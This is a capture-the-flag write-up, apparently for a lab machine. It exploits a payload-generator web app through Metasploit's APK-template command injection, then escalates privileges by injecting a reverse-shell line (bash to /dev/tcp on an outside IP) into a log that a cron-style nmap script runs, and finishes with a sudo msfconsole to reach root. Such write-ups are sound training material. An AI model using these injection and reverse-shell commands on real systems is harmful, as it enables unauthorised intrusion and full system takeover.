So we got ssh on (port 22) and a Werkzeug httpd server on (port 5000)
2. Web Enumeration:
Got this interesting page …
It makes some functions like searchsploit or making nmap scan on IPs, also making metasploit payloads!
The interesting part When generating any windows or linux payload, we discover a /static/payloads/name.exe of generated payloads where we can download from:
We also can provide a template for given payload type we are going to generate:
It includes APK templates allowed and after some googling, found out exploit module for APK templates which uses command injection:
so let’s generate an apk file and use it as our template:
use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
copy the file to your working directory .. cp /home/'username'/.msf4/local/msf.apk .
let’s make payload with the site:
choose android, your lhost ip (tun0) and the template we made (the malicious apk)
open netcat listner on the port we choose earlier in the apk (4444) - do this step before generating the payload
$ nc -lvnp 4444
And here we got shell as user kid and his flag …
note: once you hit generate you will get the shell on your nc listener
3. Privilege Escalation:
Rooting:
let’s discover files …
interesting script with lots of permissions …
let’s view it cat scanlosers.sh
#!/bin/bash
log=/home/kid/logs/hackers
cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
doneif[[$(wc -l < $log) -gt 0]]; then echo -n > $log; fi
-d’ ’ single space used as field separator and -f3- means the ip starts from the 3rd field
It’s a bash script doing some nmap scan over the logged IPs from the /home/kid/logs/hackers file.. if we could inject our reverse shell payload in the file and commenting the rest of the file to scape the parsing process; it will be executed by scanlosers.sh and we will get a root shell..
our payload:
echo "A A ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.17.34/9001 0>&1' #" >> hackers
‘#’ » for commenting the rest of nmap command and escaping the redirection to /dev/null output …
nc -lvnp 9001
And we got shell as user pwn.. not root yet!
trying sudo -l worked without pass
(root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole » means we can run metasploit as root
sudo /opt/metasploit-framework-6.0.9/msfconsole
here we can go to the root directory and view the root.txt flag:
